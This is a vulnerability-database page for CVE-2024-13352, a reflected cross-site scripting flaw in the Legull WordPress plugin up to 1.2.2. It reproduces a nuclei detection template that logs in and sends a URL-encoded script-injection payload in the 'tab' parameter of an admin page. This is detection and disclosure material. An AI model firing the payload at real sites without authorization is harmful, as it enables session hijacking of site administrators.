Lucene search
+L

Legull WordPress - Cross-Site Scripting

🗓️ 17 Aug 2026 03:58:01Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 16 Views

Legull WordPress plugin <=1.2.2 has reflected XSS via unsanitized output; a malicious link lets high-privilege users run scripts; update.

Related
Refs
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2024-13352
7 Feb 202506:12
circl
cnnvd
CNNVD
WordPress plugin Legull 安全漏洞
7 Feb 202500:00
cnnvd
cve
CVE
CVE-2024-13352
7 Feb 202506:00
cve
cvelist
Cvelist
CVE-2024-13352 Legull <= 1.2.2 - Reflected XSS
7 Feb 202506:00
cvelist
euvd
EUVD
EUVD-2024-51550
3 Oct 202520:07
euvd
nvd
NVD
CVE-2024-13352
7 Feb 202506:15
nvd
osv
OSV
CVE-2024-13352
7 Feb 202506:15
osv
patchstack
Patchstack
WordPress Legull plugin <= 1.2.2 - Reflected XSS vulnerability
7 Feb 202509:32
patchstack
ptsecurity
Positive Technologies
PT-2025-5902
7 Feb 202500:00
ptsecurity
redhatcve
RedhatCVE
CVE-2024-13352
9 Feb 202506:24
redhatcve
Rows per page
id: CVE-2024-13352

info:
  name: Legull WordPress - Cross-Site Scripting
  author: Sourabh-Sahu
  severity: high
  description: |
    Legull WordPress plugin <= 1.2.2 contains a reflected cross-site scripting caused by unsanitized parameter output, letting attackers execute arbitrary scripts in the context of high privilege users, exploit requires victim to click malicious link.
  impact: |
    Attackers can execute arbitrary scripts in the context of high privilege users, potentially leading to account compromise or data theft.
  remediation: |
    Update to the latest version of the plugin where the vulnerability is fixed.
  reference:
    - https://wpscan.com/vulnerability/2c141cc0-f79e-42bd-97a6-98829647104c/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-13352
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
    cvss-score: 7.1
    cve-id: CVE-2024-13352
    cwe-id: CWE-79
    epss-score: 0.0055
    epss-percentile: 0.43475
    cpe: cpe:2.3:a:alwayscurious:legull:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
  tags: cve,cve2024,wordpress,wp-plugin,xss,legull

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: wordpress_test_cookie=WP%20Cookie%20check

        log={{username}}&pwd={{password}}&wp-submit=Log+In&redirect_to={{RootURL}}/wp-admin/&testcookie=1

    matchers:
      - type: dsl
        dsl:
          - status_code == 302
          - contains(header, "wordpress_logged_in")
        condition: and
        internal: true

  - raw:
      - |
        GET /wp-admin/admin.php?page=legull_terms&tab=%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cscript%3E` HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains_all(body, "></script><script>alert(document.domain)</script><script>`")
        condition: and
# digest: 4a0a00473045022100b4cdb222b927bcb1e12a558168d9130c5f9f6a9259ee00ccf792cc854013a3d302200813ef0de6b6932610badaa472351b52bdc20bce5798f8625ed87031c7dc9e27:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

06 Feb 2026 13:30Current
8.6High risk
Vulners AI Score8.6
CVSS 3.17.1
EPSS0.0055
SSVC
16